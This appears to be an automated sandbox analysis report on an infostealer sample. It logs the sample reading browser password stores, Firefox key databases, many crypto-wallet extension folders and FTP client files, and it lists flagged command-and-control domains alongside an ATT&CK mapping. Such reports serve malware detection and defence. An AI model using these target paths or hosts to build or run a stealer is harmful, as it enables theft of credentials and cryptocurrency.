              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2089349102.0000000001646000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2089206820.0000000001642000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6136, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: file.exe PID: 6136, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK Matrix (techniques listed per tactic; the number in parentheses is the hit count shown in the matrix cell, where one was shown)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (2); Command and Scripting Interpreter (2); PowerShell (1); Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (34); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (751); Virtualization/Sandbox Evasion (34); Process Discovery (2); File and Directory Discovery (1); System Information Discovery (223); Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Data from Local System (41); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (113); Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label
necklacedmny.store | 23% | Virustotal |
fp2e7a.wpc.phicdn.net | 0% | Virustotal |
presticitpo.store | 11% | Virustotal |
thumbystriw.store | 15% | Virustotal |
Source | Detection | Scanner | Label
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta | 0% | URL Reputation | safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg | 0% | URL Reputation | safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | 0% | URL Reputation | safe
http://x1.c.lencr.org/0 | 0% | URL Reputation | safe
http://x1.i.lencr.org/0 | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
http://crt.rootca1.amazontrust.com/rootca1.cer0? | 0% | URL Reputation | safe
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref | 0% | URL Reputation | safe
https://support.mozilla.org/products/firefoxgro.all | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
necklacedmny.store | 188.114.96.3 | true | true | | unknown
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | unknown
presticitpo.store | unknown | unknown | true | | unknown
thumbystriw.store | unknown | unknown | true | | unknown
crisiwarny.store | unknown | unknown | true | | unknown
fadehairucw.store | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://necklacedmny.store/api | true | | unknown
presticitpo.store | true | | unknown
scriptyprefej.store | true | | unknown
necklacedmny.store | true | | unknown
fadehairucw.store | true | | unknown
navygenerayk.store | true | | unknown
founpiuer.store | true | | unknown
thumbystriw.store | true | | unknown
crisiwarny.store | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://necklacedmny.store/W1 | file.exe, 00000000.00000003.2129194532.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101214765.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100331725.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100206696.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129222308.000000000164C000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
https://duckduckgo.com/chrome_newtab | file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://necklacedmny.store:443/apiicrosoft | file.exe, 00000000.00000002.2133160668.00000000015C3000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://necklacedmny.store/api8 | file.exe, 00000000.00000003.2129194532.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129236427.0000000001650000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129222308.000000000164C000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
https://necklacedmny.store/apix | file.exe, 00000000.00000003.2100374761.0000000001637000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/apiU | file.exe, 00000000.00000002.2133401840.0000000001651000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0 | file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ocsp.rootca1.amazontrust.com0: | file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://necklacedmny.store/d | file.exe, 00000000.00000003.2101201718.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100291812.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073292088.0000000005DCA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074182580.0000000005DCA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2111114745.0000000005DCA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2134598475.0000000005DCA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129063200.0000000005DCA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073166648.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072961661.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
https://www.ecosia.org/newtab/ | file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta | file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | file.exe, 00000000.00000003.2074209325.000000000605E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/ed | file.exe, 00000000.00000002.2134513001.0000000005D30000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
https://ac.ecosia.org/autocomplete?q= | file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg | file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/ | file.exe, file.exe, 00000000.00000002.2133401840.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129194532.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133160668.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101214765.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089267859.0000000001637000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100331725.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100206696.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129222308.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100311602.000000000163D000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store:443/api.default-release/key4.dbPK | file.exe, 00000000.00000002.2133160668.00000000015C3000.00000004.00000020.00020000.00000000.sdmp | true
                                                            unknown
